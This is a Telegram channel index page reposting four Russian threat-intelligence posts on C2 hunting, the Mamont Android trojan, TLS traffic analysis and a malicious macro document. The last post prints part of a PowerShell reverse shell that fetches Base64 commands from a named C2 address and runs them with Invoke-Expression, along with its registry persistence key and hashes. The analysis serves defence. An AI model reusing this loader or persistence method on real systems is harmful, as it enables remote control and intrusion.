TGTGInsightintelligence telegramLIVE / telegram public index
Torna ai canali
CyberSquatting RU Alerts avatar

TGINSIGHT CHAT

CyberSquatting RU Alerts

@CyberSquattingChannel

Tecnologie

Iscritti2,360Iscritti attuali
Post tracciati1,012Post indicizzati
Reach recente2,544Visualizzazioni post recenti
Post recenti

Post recenti

Tag: #malware · 4 post

当前筛选 #malware清除筛选

Pubblicato 17 feb

C2 hunting: часть 2. Ищем серверы хакеров по внешним признакам 😁 В предыдущей части мы с вами поговорили о том, как расширить знание об инфраструктуре хакеров, используя PDNS и Whois. Сегодня обсудим, как искать серверы хакеров не только когда они уже начали использовать свою инфраструктуру в атаках, но и в момент ее развертывания. Перед самой атакой хакеры, как правило, занимаются подготовкой инструментария и сетевой инфраструктуры. В моделях угроз этот этап обычно называется weaponization или resource development. Практически у любого ВПО в том или ином виде есть механизм коммуникации с C2. Сам C2 обладает рядом признаков, которые могут быть получены, если его просканировать или просто обратиться на конкретный порт, например 443. Так мы, скорее всего, получим параметры TLS-сертификата, параметры TLS-соединения, заголовки ответа сервера и содержимое веб-страницы. Соответственно, разбирая ВПО хакеров и анализируя их сетевую инфраструктуру, мы будем иметь представление об уникальных признаках, которые они используют на своих C2 для конкретного ВПО, что позволит нам в некоторых случаях обнаруживать их C2 в момент развертывания сетевой инфраструктуры для атаки и превентивно блокировать эти индикаторы на СЗИ. Список наиболее популярных признаков, которые можно использовать для идентификации С2: ✅ Параметры TLS-сертификата ✅ Параметры TLS-соединения (JA3, JA4, JARM и т. д.) ✅ Заголовки ответа от сервера ✅ Контент и title страницы ✅ Набор открытых портов ✅ Favicon Ограничить поиск всегда можно с помощью указания ASN, хостера или страны. Список сервисов, которые помогут вам искать С2 таким способом: ✅ Shodan ✅ Censys ✅ FOFA ✅ ZoomEye ✅ BinaryEdge ✅ Netlas ✅ ONYPHE ✅ Самописный сканер Руками искать по всем сервисам трудозатратно, но все же необходимо, так как каждый сервис может выдать разные результаты. Чтобы снизить затраты на ручной труд, нужна автоматизация. Мы у себя разработали систему SCANDAT, которая имеет внутренний поисковый синтаксис и автоматически генерирует поисковые правила под каждый сервис. 😠 На скриншотах 1–3 вы можете увидеть примеры запросов для обнаружения C2 для ВПО GoRed, которое использует группа ExCobalt. Кроме того, есть базовое опенсорс-решение для автоматизации запросов. В конечном итоге все идентифицированные C2 из нашей системы попадают в продукты компании, повышая уровень обнаружения угроз. 💡 Стоит отметить, что некоторые разработчики MaaS стараются противодействовать таким методам обнаружения. Например, с определенной версии Medusa Stealer ее разработчики убрали title, некоторый контент на странице и добавили генерацию случайных данных в TLS-сертификат, чтобы нельзя было идентифицировать панель управления стилером через популярные сервисы. Вы можете не только собирать такие серверы и отправлять их в фиды для СЗИ, но и писать эмуляторы сетевого протокола ВПО, чтобы со свежего С2 получить пейлоад или какой-либо модуль. Это позволит вам получить дополнительные индикаторы и атрибуционные признаки. #TI#C2#tips#hunt#malware @ptescalator

666 views

Pubblicato 10 feb

Лох не мамонт, APK не видео🦣 В конце 2024 — начале 2025 года в сети активно обсуждалась информация о распространении в Telegram вируса Mamont. Этот банковский троян, представляющий собой вредоносный .apk-файл, встречался нам с именами CBO-Information.apk, Фoтoгpaф.apk, Google Video.apk, Video.apk, Видео.apk, Фото.apk, Photo.apk, Докyмент <Количество штук>.apk и т. п. При установке на телефон — запрашивает разрешение на установку в качестве приложения для СМС по умолчанию. При закрытии скрывает от пользователя свое присутствие в системе, убирая значок из меню на главном экране. При этом в фоновом режиме собирает информацию об установленных приложениях, о сим-картах, СМС-сообщениях, вызовах, а также другие пользовательские данные и отправляет их на управляющий сервер. 🔑Пути проникновения на ваш Android Неизвестный отправляет вам в мессенджере файл с расширением .apk и спрашивает, не вы ли изображены на фото или видео. Иногда требует срочно открыть архив с документами, который представляет собой .apk-файл. Вирус также может попасть на устройство: • через фишинговые сайты; • через QR-коды для вступления в закрытые группы, каналы и т. п.; • под видом легитимных приложений (.apk-файлы не с официальных магазинов); • при наличии физического доступа у злоумышленника. 🔐Как не попасться 1️⃣ Будьте более внимательными: • не переходите по ссылкам из сообщений, не посмотрев, куда они ведут; • не вводите данные учетной записи на подозрительных ресурсах; • избегайте сканирования QR-кодов в общественных местах (они могут вести на фишинговые сайты); • не открывайте файлы из недоверенных источников. 2️⃣ Настройте конфиденциальность в мессенджере. Вы можете запретить приглашать вас в группы и отключить получение СМС-сообщений от незнакомых пользователей («Настройки» → «Конфиденциальность»). 3️⃣ При получении от знакомого голосовых, СМС- и видеосообщений с необычными просьбами свяжитесь с ним через альтернативные каналы (злоумышленники часто используют дипфейки). 4️⃣ Не храните пароли и банковские реквизиты в избранных сообщениях и чатах. 5️⃣ Устанавливайте приложения только из официальных магазинов и с сайтов разработчиков. Проверяйте запрашиваемые разрешения: если приложение требует доступ к данным, не соответствующим его функциональности, это может указывать на вредоносное ПО. 6️⃣ Регулярно проверяйте список установленных приложений — раздел «Приложения» («Установленные файлы» и т. п.) в параметрах устройства. Некоторое вредоносное ПО скрывает себя от пользователя. Можно также использовать средства для мониторинга активности, которые уведомят о подозрительных действиях. 7️⃣ Обращайте внимание на уведомления и поведение устройства. Если приходит много нетипичных уведомлений или устройство сильно нагревается в неактивном состоянии, это может быть признаком того, что оно заражено. 8️⃣ Регулярно обновляйте ОС и приложения. В обновлениях часто содержатся исправления безопасности. 9️⃣ Используйте проверенные антивирусы. 1️⃣0️⃣ Для защиты от физического доступа к устройству используйте надежный пароль. 1️⃣1️⃣ Регулярно создавайте резервные копии данных и храните их в безопасном месте. 1️⃣2️⃣ Для оценки ущерба при заражении мобильного устройства проведите его исследование. 1️⃣3️⃣ Постоянно обучайтесь и будьте в курсе новых угроз. Для общей осведомленности можете пройти бесплатные курсы Positive Technologies — «Личная кибербезопасность» и «Базовая кибербезопасность: первое погружение». 💡Помните, что APK (Android Package Kit) — это формат, используемый в контексте приложений, но никак не для фото- и видеофайлов. 🎁Бонус: опубликовали IoCs за 2025 год в Telegraph. #news#tips#malware @ptescalator

544 views

Pubblicato 2 ott

TLS в сети: как быть🤷‍♂️ Ты — мощный движок разбора сетевого трафика. Ты работаешь на благо системы защиты информации, перемалывая терабайты проходящих через тебя данных. В твоих недрах крутятся десятки тысяч нефолзящих экспертных правил, тебе не страшны любые протоколы L7 — HTTP, SMTP, FTP, DNS. Но внезапно в тебя подают какую-то невнятную мешанину из байтиков сетевого соединения по 443-му порту, которая начинается с магических |1603| 🧙 «О нет!». Это же TLS, декрипт которого никто не удосужился сделать, и его инкапсулированное содержимое теперь скрыто от тебя. Но ведь внутри может быть что-то плохое, что-то вредоносное. Как же быть? Не расстраивайся! TLS-трафик в целом поддается анализу, хоть и не контентному. Можно выделить два основных метода: 1. Анализ информации из заголовков и сертификатов. 2. Анализ характеристик TCP-сессий. Анализ информации из заголовков и сертификатов (актуально для версии TLS ниже 1.3) Основные параметры заголовков, которые можно проанализировать: • Версия протокола. Например, SSL 3.0 или TLS 1.0. • Наборы шифров (cipher suites) — указывают на алгоритмы, которые будут использоваться для шифрования данных и создания MAC (Message Authentication Code). • Алгоритмы сжатия. • Порядок и типы поддерживаемых расширений. Например, расширение ALPN (Application-Layer Protocol Negotiation) используется для согласования протокола прикладного уровня (например, HTTP/2 или HTTP/3). Аспекты анализа сертификатов: • Цепочка сертификации: кто выдал сертификат (центр сертификации, CA), является ли цепочка валидной и корректно ли настроена. • Срок действия сертификата: просроченные или неправильно настроенные сертификаты свидетельствуют о небезопасной конфигурации сервера или атаке, например о MITM (man in the middle). • Подозрительные имена серверов (Common Name): они могут сигнализировать о поддельных или скомпрометированных сертификатах. Например, С2-сервер VenomRAT по умолчанию предоставляет интересную информацию о себе (скриншот 1). 🫵Дополнительно можно анализироватьцифровые отпечатки — уникальные идентификаторы клиентов, устанавливающих TLS-соединения, или серверов, принимающих такие соединения. В основе работы JA3 и JA3s лежат сбор характеристик во время TLS-рукопожатия и генерация отпечатка. JA3 — это хеш-функция, которая вычисляется с помощью алгоритма MD5 на основе параметров, передаваемых клиентом при установке TLS-соединения. В результате формируется уникальный идентификатор клиента — JA3-отпечаток (WARNING — может фолзить!). Например, JA3 a85be79f7b569f1df5e6087b69deb493 однозначно указывает на соединение ВПО Remcos с С2-сервером (скриншот 2). Детектирование на основании JA3 и JA3s поддерживают практически все сетевые СЗИ, в том числе и продукты Positive Technologies — PT NAD и PT Sandbox. Анализ TLS 1.3 — более сложная задача, но об этом в другой раз. Анализ характеристик TCP-сессий Анализатор может смотреть на характеристики TCP-сессий, инкапсулирующих зашифрованный трафик: на размер пакетов, их частоту и временные интервалы между ними. Даже не видя содержимого пакетов, DPI-система способна сделать выводы о типе трафика или возможной аномалии. В качестве примера можно привести бэкдор, который все делал правильно: «притащил» библиотеку для работы с SSL, пытаясь скрыть свои очень важные данные. Однако в сети он вел себя весьма интересно: клиент (то есть бэкдор) всегда отправлял на С2-сервер полезную нагрузку TCP размером 163 байта, а сервер отвечал ему полезной нагрузкой размером 166 байт (скриншот 3). Это или какой-то Heartbeat, или волшебный padding. Понаблюдав за бэкдором некоторое время, убедившись, что это поведение не просто аномалия, а повторяющийся шаблон, мы с чистой совестью покрыли его детектом. Вывод: увидел TLS — не расстраивайся. Happy hunting! 🎯 #detect#malware#network#hunt#tips @ptescalator

673 views

Pubblicato 14 ago

!!р^д**н**c🤔 Характерным примером того, как злоумышленники используют актуальные события для распространения вредоносных программ, может послужить обнаруженный нами вредоносный документ. Он содержит текст муниципального правового акта, который не отображается корректно, в связи с чем пользователя побуждают «Включить содержимое» и разрешить таким образом выполнение встроенного в документ макроса. Встроенный макрос приводит документ к читаемому виду путем простой замены комбинаций символов на буквы (;; → у ; ** → o ; ?? → a и т. д.), а также извлекает и закрепляет в автозагрузке полезную нагрузку — достаточно простой реверс-шелл — в виде PowerShell-скрипта. Полезная нагрузка находится в содержимом документа после строки DigitalRSASignature и состоит из двух частей, закодированных в Base64 и разделенных строкой CHECKSUM — <part1>CHECKSUM<part2>, которые декодируются и записываются в файлы: •<part1> -> %USERPROFILE%\\UserCache.ini.hta •<part2> -> %USERPROFILE%\\UserCache.ini UserCache.ini.hta прописывается макросом в автозапуск Windows Explorer через ключ реестра HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\LOAD. Назначение данного файла — запустить исполнение файла UserCache.ini. UserCache.ini представляет собой легковесный реверс-шелл, который использует узел 94.103.85.47 (Vdsina, Moscow) как управляющий сервер. Данный инструмент получает и выполняет набор команд с http://94.103.85.47:80/api/texts/<client_id>, где <client_id> = <имя компьютера>_<имя пользователя>_<серийник тома жесткого диска>. Команды передаются в формате XML и содержат несколько атрибутов: • CountRuns — сколько раз нужно выполнить команду; • Interval — интервал ожидания в минутах между последовательными выполнениями одной команды; • Module — закодированная в Base64 команда. ... try { $Commands = [xml]$Configs; $cycle_num = 0; while($true){ $num_commands_completely_executed = 0; $num_commands_executed = 0; foreach ($CommandConfig in $Commands.Configs.Config) { $num_commands_executed += 1; $quot = [int][Math]::Floor( $cycle_num / [int]$CommandConfig.Interval); $rem = [int][Math]::Floor( $cycle_num % [int]$CommandConfig.Interval); if($quot -lt [int]$Command.CountRuns -and $rem -eq 0){ $command_expr = FromBase64 $CommandConfig.Module; try{ Invoke-Expression($command_expr); } catch {} } if(([int]$CommandConfig.Interval * [int]$CommandConfig.CountRuns) -lt [int]$cycle_num){ $num_commands_completely_executed += 1; } } Start-Sleep 60; if([int]$num_commands_completely_executed -eq [int]$num_commands_executed){ break; } $cycle_num += 1; } } catch {} ... Для блокировки автоматического выполнения макросов можно воспользоваться руководством от Microsoft. IoCs: Постановление_по_ГО_updated.doc 13252199b18d5257a60f57de95d8c6be7d7973df7f957bca8c2f31e15fcc947b UserCache.ini.hta e80e0b57cf3f304cb7d6dba4b0bb65da18f4d32770a3d6f3780fdab12d2617c9 UserCache.ini ccff23a8f7c510b49264cdacf9ab6b43e9be0671670ce2eec75851920e6378b7 94.103.85.47 #malware#news#detect @ptescalator

661 views